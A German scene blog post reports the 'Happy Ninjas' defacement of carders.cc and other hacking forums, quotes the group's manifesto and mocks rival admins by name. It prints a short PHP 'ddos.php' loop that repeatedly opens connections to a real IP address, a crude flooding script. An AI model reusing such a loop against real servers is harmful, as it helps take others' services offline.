Das sind tolle Weihnachten - wieder einmal ist es soweit und das "top abgesicherte" Forum
Carders.cc wurde hacked.
DEIM0S, der über sich selbst verbreitet, dass er 2x4 Supporter sei (Post darüber kommt in geraumer Zeit) was natürlich vollkommener Schwachsinn ist, hat wieder einmal bewiesen, dass er von Sicherheit nicht besonders viel Ahnung hat.
Anscheinend stecken wieder die "Happy Ninjas" hinter dem Hack, es wurden alle Threads und Posts ersetzt durch
Happy ninjas are not happy :( Read: http://sharebee.com/52b9f14f
Read: http://sharebee.com/52b9f14f
Nachricht von den Ninjas:
http://nopaste.me/paste/4d15e1a4c4943.html
Da bringt Vatali (aka DEIM0S) sein "cooles" FreeBSD Avatar auch nichts, mehr Ahnung von diesem OS, oder von irgendetwas sonst, hat er dadurch auch nicht. Sein Avatar ist in etwa so lächerlich wie seine Hochstaplerei.
Es scheinen auch andere Foren wie
free-hack.com betroffen zu sein. Da wird sich der Zuckerbäcker (Suicide) von Free-hack bestimmt ärgern.
We owned ettercap because we were tired of people firing that shit up
and pretending to be a l33th4x0r sheep who think they are the greatest
hackerz with their ARP spoofing toolkitz.. If you have installed
ettercap in the last 5 years you may want to check yo shit (;p).
We owned offsec including backtrack and exploit-db because they are
fucking security "expert" maggots (oops s/m/f/) who just fail so hard
at security that we wonder why people really take their training
courses. We imagine it's like open mic night at the laughatorium.
We owned inj3ct0r because they are lameass wannabe milw0rm kids whose
sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake
anyone?).
We owned carders.cc (AGAIN) because they are unable to learn from
their mistakes and keep spreading garbage around the underground.
We owned free-hack because they are developing into one of the
largest, most arrogant script-kiddie breeding grounds on the
intertubez.
Interessant ist die Datei "ddos.php" auf dem carders.cc Server mit dem Inhalt:
$ cat ddos.php
phpwhile(1==1) {
$fp = fsockopen("92.241.190.202", 80, $errno, $errstr, 30);
}
?>
Carders.cc plant schon länger ein
eigenes Botnet zu erstellen. Mit diesem (lamer) DoS Script bestätigt sich wohl die Vermutung von
cyber-economy.blogspot.com. Carders versucht mit allen Mitteln die Konkurrenz auszuschalten, aber mit so einem Lamerscript wird das wohl nichts...
Der RDNS von 92.241.190.202 lautet "webspace.heihachi.net". Es liegt die Vermutung nahe, dass man geziehlt diesen Server abschalten möchte, da dort viele Scriptkiddyseiten liegen. Geschafft hat es carders offensichtlich allerdings nicht.
Interessant ist auch die Aussage von Suizid (Free-hack Admin):
Warum überhaupt umziehen? Der neue Server hat ungefähr die
gleichen Attribute wie der Jetzige. Dazu wird die Firewall um das
doppelte verstärkt. Im Gesamtpaket komme ich da besser weg, als in
der momentanen Situation.
So ziemlich jeder weiß, dass Free-hack nie mit DDoS zurecht gekommen ist.
Free-hack lässt sich ihren Server immer vom Hoster managen, da sie selbst dazu nicht in der Lage sind. Oder wie war das nochmal mit Luna?
Happy Ninjas meinen zur Free-hack Firewall:
Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
Too ninja again.
Ich werde nun nicht alles kommentieren, lest euch den Text einfach selbst durch.
Außerdem wette ich, dass bald unser geliebter Versager Killu aufkreuzt und irgendwelche Thesen aufstellt wie "ich hab euch auch gehackt" oder "ich hab die datenbank!" oder sonstiges.